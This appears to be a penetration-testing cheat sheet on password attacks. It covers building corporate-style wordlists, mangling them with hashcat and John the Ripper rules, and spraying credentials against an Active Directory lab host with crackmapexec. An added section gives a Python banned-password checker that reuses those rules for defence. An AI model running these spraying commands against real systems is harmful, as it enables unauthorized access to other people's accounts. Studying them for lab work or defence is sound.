Password Cracking

Infra password cracking - Build your own wordlist that fits

Take a wordlist

for example a statistically meaningful one:

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txt

or build your own from user enumeration (SMB, RPC, web)

Building Your Own Password Wordlist

usernames including admins
seasons
password
<empty>

Mangling with Rules

Enrich your wordlist with rules: append a bit, reverse, toggle case, mangle...

hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list

John The Ripper

john hashes --wordlist=mywordlist --rules=MyRuleSet

where the rule sets are defined in /etc/john/john.conf:

[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"

[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
 
[List.Rules:Double]
d
p5
 
[List.Rules:Reflect]
f
 
[List.Rules:Reverse]
r
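The seed list above (usernames including admins, seasons, "password", empty) and the John rule sets are also enough for a defender to build a banned-password check: if a proposed password appears in the expanded list, the wordlist attack described here will find it on the first pass. The Python below is an added example, not part of the original page and not code from John the Ripper or hashcat. It implements only the rule commands that appear in the john.conf excerpt (T<n> toggle, d double, f reflect, r reverse, Az with the [0-9] preprocessor class), adds John's ":" no-op so the bare seeds count too, skips the p5 line, and uses a constructed seed list.

```python
"""Expand a seed wordlist with John-style rules and use the result as a
banned-password check (added example; not code from the page or from John)."""
import itertools
import re

# Constructed seed list following the page's recipe: usernames (including an
# admin), seasons, "password" and the empty string.
SEED_WORDS = ["jsmith", "admin", "Summer", "Winter", "password", ""]

# The rule lines from the page's john.conf excerpt (p5 is not implemented here).
PAGE_RULES = [
    'Az"[0-9][0-9][0-9][0-9]"',                            # MyRuleSet: append 4 digits
    "T0", "T1", "T2", "T0T1", "T1T2", "T0T2", "T0T1T2",    # Toggle
    "d",                                                   # Double
    "f",                                                   # Reflect
    "r",                                                   # Reverse
]

_CLASS = re.compile(r"\[([^\]]+)\]")


def _expand_classes(s):
    """Expand John preprocessor classes such as [0-9] into every combination."""
    parts, pos = [], 0
    for m in _CLASS.finditer(s):
        parts.append([s[pos:m.start()]])
        rng = m.group(1)
        if len(rng) == 3 and rng[1] == "-":          # range form a-z / 0-9
            chars = [chr(c) for c in range(ord(rng[0]), ord(rng[2]) + 1)]
        else:                                        # literal set form
            chars = list(rng)
        parts.append(chars)
        pos = m.end()
    parts.append([s[pos:]])
    return ["".join(p) for p in itertools.product(*parts)]


def _toggle(word, pos):
    """T<n>: toggle the case of the character at position n (no-op past the end)."""
    if pos < len(word):
        return word[:pos] + word[pos].swapcase() + word[pos + 1:]
    return word


def apply_rule(rule, word):
    """Apply one rule line to a word. Returns a set, because a line with
    preprocessor classes stands for many concrete rules."""
    results = {word}
    i = 0
    while i < len(rule):
        if rule.startswith('Az"', i):                # append a string
            end = rule.index('"', i + 3)
            suffixes = _expand_classes(rule[i + 3:end])
            results = {w + s for w in results for s in suffixes}
            i = end + 1
            continue
        cmd = rule[i]
        if cmd == ":":                               # John's no-op rule
            i += 1
        elif cmd == "T":                             # only digit positions handled
            results = {_toggle(w, int(rule[i + 1])) for w in results}
            i += 2
        elif cmd == "d":                             # duplicate: pass -> passpass
            results = {w + w for w in results}
            i += 1
        elif cmd == "f":                             # reflect: pass -> passssap
            results = {w + w[::-1] for w in results}
            i += 1
        elif cmd == "r":                             # reverse: pass -> ssap
            results = {w[::-1] for w in results}
            i += 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r} in {rule!r}")
    return results


def expand_wordlist(seeds, rules):
    """Every candidate the seed list produces under the given rules."""
    out = set()
    for word in seeds:
        for rule in rules:
            out |= apply_rule(rule, word)
    return out


BANNED = expand_wordlist(SEED_WORDS, [":"] + PAGE_RULES)


def is_guessable(candidate, banned=BANNED):
    """True if the candidate would fall to the page's seed list plus rule set."""
    return candidate in banned


if __name__ == "__main__":
    for pw in ["Summer2024", "Password", "adminadmin", "1234", "Summer2024!"]:
        print(f"{pw!r:15} guessable={is_guessable(pw)}")
```

The expanded set for six seeds is about 60k strings, dominated by the four-digit append rule; a real banned-password list would be fed the organisation's own usernames and local vocabulary the same way.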

Now that you have a wordlist that fits, prepare for the online password attack by checking...

Account Policy

Determine the account lockout policy of the target Active Directory before you start locking out accounts:

crackmapexec smb 10.129.228.111 --pass-pol

Start to crack with

Crackmapexec smb

# usernames only
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst
